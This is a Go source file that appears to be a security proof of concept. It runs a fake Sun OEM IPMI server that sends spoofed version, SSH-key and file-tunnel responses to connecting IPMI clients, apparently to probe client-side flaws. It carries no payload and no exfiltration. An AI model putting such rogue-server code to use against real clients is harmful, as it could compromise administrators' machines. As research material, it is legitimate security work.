package main

import (
	"encoding/binary"
	"log"
	"net"
	"os"
	"os/signal"
	"syscall"

	"a.yandex-team.ru/security/pocs/sunny/ipmi"
)

type GetFileRequest struct {
	CmdCode  uint8
	FileId   [16]byte
	BlockNum uint32
}

type GetFileResponse struct {
	ipmi.CompletionCode
	BlockNum uint32
	DataSize [4]byte
	Eof      uint8
	Data     [1024]byte
}

type VersionResponse struct {
	ipmi.CompletionCode
	OEMRecordVerNum uint8
	Major           uint8
	Minor           uint8
	Update          uint8
	Micro           uint8
	Nano            [10]byte
	Revision        [10]byte
	Version         [40]byte
	Spare           [40]byte
}

func main() {
	s := ipmi.NewSimulator(net.UDPAddr{
		Port: 6882,
	})

	// IPMI_SUNOEM_VERSION
	s.SetHandler(0x2e, 0x24, func(m *ipmi.Message) ipmi.Response {
		return VersionResponse{
			CompletionCode: ipmi.CommandCompleted,
			Major:          99,
			Minor:          99,
		}
	})

	// IPMI_SUNOEM_SET_SSH_KEY
	s.SetHandler(0x2e, 0x01, func(m *ipmi.Message) ipmi.Response {
		_, _ = os.Stdout.Write(m.Data[3:])
		return ipmi.CommandCompleted
	})

	// IPMI_SUNOEM_CORE_TUNNEL
	s.SetHandler(0x2e, 0x44, func(m *ipmi.Message) ipmi.Response {
		var req GetFileRequest
		if err := m.Request(&req); err != nil {
			log.Printf("failed to read getfile_req: %v", err)
			return err
		}

		var dataSize [4]byte
		binary.BigEndian.PutUint32(dataSize[:], 3)
		return GetFileResponse{
			CompletionCode: ipmi.CommandCompleted,
			BlockNum:       req.BlockNum,
			DataSize:       dataSize,
			Data:           [1024]byte{'k', 'e', 'k'},
			Eof:            1,
		}
	})

	if err := s.Run(); err != nil {
		panic(err)
	}

	quit := make(chan os.Signal, 2)
	signal.Notify(quit, syscall.SIGINT, syscall.SIGTERM)
	<-quit
}
